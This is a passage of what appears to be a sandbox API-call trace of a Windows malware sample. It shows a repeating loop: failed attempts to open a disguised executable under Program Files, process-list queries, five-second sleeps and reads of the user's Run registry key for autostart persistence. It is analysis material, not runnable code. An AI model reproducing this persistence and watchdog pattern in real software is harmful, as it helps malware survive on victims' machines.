FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.227] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0287.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.227] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.227] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0287.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0287.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0287.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0287.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0287.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0287.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0287.335] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0287.336] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0287.337] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0287.337] NtClose (Handle=0x338) returned 0x0 [0287.337] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.337] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.337] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0287.337] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.337] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.337] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0287.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0287.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0287.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0287.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0287.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0287.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0287.440] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0287.441] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0287.443] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0287.443] NtClose (Handle=0x338) returned 0x0 [0287.443] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.443] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.443] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0287.443] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.444] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.444] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0287.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0287.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0287.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0287.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0287.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0287.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0287.544] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0287.545] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0287.546] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0287.546] NtClose (Handle=0x338) returned 0x0 [0287.546] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.546] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.546] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0287.546] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.547] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.547] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0287.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0287.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0287.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0287.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0287.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0287.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0287.646] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0287.648] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0287.648] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0287.648] NtClose (Handle=0x338) returned 0x0 [0287.648] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.648] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.648] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0287.648] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.649] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.649] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0287.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0287.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0287.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0287.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0287.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0287.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0287.751] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0287.753] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0287.754] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0287.754] NtClose (Handle=0x338) returned 0x0 [0287.754] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.754] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.755] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0287.755] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.755] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.755] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0287.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0287.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0287.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0287.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0287.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0287.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0287.875] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0287.876] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0287.877] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0287.877] NtClose (Handle=0x338) returned 0x0 [0287.878] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.878] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.878] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0287.878] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.878] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.878] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0287.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0287.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0287.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0287.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0287.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0287.991] NtFreeVirtualMemory 